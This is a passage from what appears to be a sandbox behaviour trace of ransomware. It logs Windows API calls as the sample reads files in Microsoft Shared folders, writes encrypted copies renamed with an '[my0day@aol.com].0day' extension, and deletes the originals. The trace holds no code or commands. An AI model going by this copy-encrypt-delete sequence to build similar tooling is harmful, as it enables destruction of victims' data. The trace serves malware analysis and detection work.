lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.597] lstrlenW (lpString=".rar") returned 4 [0050.597] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.597] lstrlenW (lpString=".bz2") returned 4 [0050.597] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.597] lstrlenW (lpString=".7z") returned 3 [0050.597] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.597] lstrlenW (lpString=".dbf") returned 4 [0050.597] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.597] lstrlenW (lpString=".1cd") returned 4 [0050.597] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.597] lstrlenW (lpString=".jpg") returned 4 [0050.598] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.598] lstrlenW (lpString=".doc") returned 4 [0050.598] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.598] lstrlenW (lpString=".docx") returned 5 [0050.598] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0050.598] lstrlenW (lpString=".pdf") returned 4 [0050.598] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.598] lstrlenW (lpString=".xls") returned 4 [0050.598] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.598] lstrlenW (lpString=".xlsx") returned 5 [0050.598] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0050.598] lstrlenW (lpString=".ppt") returned 4 [0050.598] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.598] lstrlenW (lpString=".zip") returned 4 [0050.598] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.598] lstrlenW (lpString=".rar") returned 4 [0050.598] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.598] lstrlenW (lpString=".bz2") returned 4 [0050.598] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.598] lstrlenW (lpString=".7z") returned 3 [0050.598] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.598] lstrlenW (lpString=".dbf") returned 4 [0050.598] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.598] lstrlenW (lpString=".1cd") returned 4 [0050.598] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0050.598] lstrlenW (lpString=".jpg") returned 4 [0050.598] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.599] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0050.599] lstrlenW (lpString="offfiltx.dll") returned 12 [0050.599] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0051.197] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=1486736) returned 1 [0051.197] CloseHandle (hObject=0x1a0) returned 1 [0051.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 0x20 [0051.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0051.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0051.198] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.198] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0051.198] GetLastError () returned 0x0 [0051.198] ReadFile (in: hFile=0x1a0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0051.632] WriteFile (in: hFile=0x190, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0051.940] ReadFile (in: hFile=0x1a0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x6afa0, lpOverlapped=0x0) returned 1 [0051.954] WriteFile (in: hFile=0x190, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x6afb0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x6afb0, lpOverlapped=0x0) returned 1 [0051.964] ReadFile (in: hFile=0x1a0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.964] WriteFile (in: hFile=0x190, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.964] SetEndOfFile (hFile=0x190) returned 1 [0051.964] CloseHandle (hObject=0x190) returned 1 [0051.965] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.965] SetEndOfFile (hFile=0x1a0) returned 1 [0051.968] CloseHandle (hObject=0x1a0) returned 1 [0051.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.969] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 1 [0051.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.969] lstrlenW (lpString=".doc") returned 4 [0051.969] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0051.969] lstrlenW (lpString=".docx") returned 5 [0051.969] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0051.969] lstrlenW (lpString=".pdf") returned 4 [0051.969] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0051.969] lstrlenW (lpString=".xls") returned 4 [0051.969] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0051.969] lstrlenW (lpString=".xlsx") returned 5 [0051.969] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0051.969] lstrlenW (lpString=".ppt") returned 4 [0051.969] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0051.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.969] lstrlenW (lpString=".zip") returned 4 [0051.969] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0051.969] lstrlenW (lpString=".rar") returned 4 [0051.969] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0051.969] lstrlenW (lpString=".bz2") returned 4 [0051.969] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0051.969] lstrlenW (lpString=".7z") returned 3 [0051.969] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0051.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.969] lstrlenW (lpString=".dbf") returned 4 [0051.969] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0051.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.969] lstrlenW (lpString=".1cd") returned 4 [0051.970] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0051.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.970] lstrlenW (lpString=".jpg") returned 4 [0051.970] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0051.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.970] lstrlenW (lpString=".doc") returned 4 [0051.970] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0051.970] lstrlenW (lpString=".docx") returned 5 [0051.970] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0051.970] lstrlenW (lpString=".pdf") returned 4 [0051.970] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0051.970] lstrlenW (lpString=".xls") returned 4 [0051.970] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0051.970] lstrlenW (lpString=".xlsx") returned 5 [0051.970] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0051.970] lstrlenW (lpString=".ppt") returned 4 [0051.970] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0051.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.970] lstrlenW (lpString=".zip") returned 4 [0051.970] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0051.970] lstrlenW (lpString=".rar") returned 4 [0051.970] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0051.970] lstrlenW (lpString=".bz2") returned 4 [0051.970] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0051.970] lstrlenW (lpString=".7z") returned 3 [0051.970] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0051.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.970] lstrlenW (lpString=".dbf") returned 4 [0051.970] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0051.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.970] lstrlenW (lpString=".1cd") returned 4 [0051.970] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0051.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.971] lstrlenW (lpString=".jpg") returned 4 [0051.971] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0051.971] lstrcmpiW (lpString1=".FLT", lpString2=".0day") returned 1 [0051.971] lstrlenW (lpString="GIFIMP32.FLT") returned 12 [0051.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0052.581] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=320384) returned 1 [0052.581] CloseHandle (hObject=0x17c) returned 1 [0052.581] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 0x20 [0052.581] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.611] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0052.612] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.612] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0053.875] GetLastError () returned 0x0 [0053.877] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x4e380, lpOverlapped=0x0) returned 1 [0053.896] WriteFile (in: hFile=0x244, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x4e390, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x4e390, lpOverlapped=0x0) returned 1 [0053.901] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.901] WriteFile (in: hFile=0x244, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.901] SetEndOfFile (hFile=0x244) returned 1 [0053.902] CloseHandle (hObject=0x244) returned 1 [0053.902] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.902] SetEndOfFile (hFile=0x17c) returned 1 [0053.905] CloseHandle (hObject=0x17c) returned 1 [0053.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.905] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 1 [0053.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.905] lstrlenW (lpString=".doc") returned 4 [0053.905] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.905] lstrlenW (lpString=".docx") returned 5 [0053.905] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.905] lstrlenW (lpString=".pdf") returned 4 [0053.905] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.905] lstrlenW (lpString=".xls") returned 4 [0053.905] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.905] lstrlenW (lpString=".xlsx") returned 5 [0053.905] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.905] lstrlenW (lpString=".ppt") returned 4 [0053.905] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.905] lstrlenW (lpString=".zip") returned 4 [0053.905] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.905] lstrlenW (lpString=".rar") returned 4 [0053.906] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.906] lstrlenW (lpString=".bz2") returned 4 [0053.906] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.906] lstrlenW (lpString=".7z") returned 3 [0053.906] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.906] lstrlenW (lpString=".dbf") returned 4 [0053.906] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.906] lstrlenW (lpString=".1cd") returned 4 [0053.906] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.906] lstrlenW (lpString=".jpg") returned 4 [0053.906] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.906] lstrlenW (lpString=".doc") returned 4 [0053.906] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.906] lstrlenW (lpString=".docx") returned 5 [0053.906] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.906] lstrlenW (lpString=".pdf") returned 4 [0053.906] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.906] lstrlenW (lpString=".xls") returned 4 [0053.906] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.906] lstrlenW (lpString=".xlsx") returned 5 [0053.906] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.906] lstrlenW (lpString=".ppt") returned 4 [0053.906] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.906] lstrlenW (lpString=".zip") returned 4 [0053.906] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.906] lstrlenW (lpString=".rar") returned 4 [0053.906] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.906] lstrlenW (lpString=".bz2") returned 4 [0053.906] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.907] lstrlenW (lpString=".7z") returned 3 [0053.907] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.907] lstrlenW (lpString=".dbf") returned 4 [0053.907] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.907] lstrlenW (lpString=".1cd") returned 4 [0053.907] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67 [0053.907] lstrlenW (lpString=".jpg") returned 4 [0053.907] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.907] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0053.907] lstrlenW (lpString="hxds.dll") returned 8 [0053.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.917] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=1257984) returned 1 [0053.917] CloseHandle (hObject=0x17c) returned 1 [0053.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 0x20 [0053.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0053.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0053.917] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.917] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0053.918] GetLastError () returned 0x0 [0053.918] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0053.937] WriteFile (in: hFile=0x244, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0053.954] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x33210, lpOverlapped=0x0) returned 1 [0054.145] WriteFile (in: hFile=0x244, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x33220, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x33220, lpOverlapped=0x0) returned 1 [0054.151] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.151] WriteFile (in: hFile=0x244, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe4, lpOverlapped=0x0) returned 1 [0054.151] SetEndOfFile (hFile=0x244) returned 1 [0055.112] CloseHandle (hObject=0x244) returned 1 [0055.136] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.136] SetEndOfFile (hFile=0x17c) returned 1 [0055.138] CloseHandle (hObject=0x17c) returned 1 [0055.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.138] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 1 [0055.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.139] lstrlenW (lpString=".doc") returned 4 [0055.139] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.139] lstrlenW (lpString=".docx") returned 5 [0055.139] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0055.139] lstrlenW (lpString=".pdf") returned 4 [0055.139] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.139] lstrlenW (lpString=".xls") returned 4 [0055.139] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.139] lstrlenW (lpString=".xlsx") returned 5 [0055.139] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0055.139] lstrlenW (lpString=".ppt") returned 4 [0055.139] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.139] lstrlenW (lpString=".zip") returned 4 [0055.139] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.139] lstrlenW (lpString=".rar") returned 4 [0055.139] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.139] lstrlenW 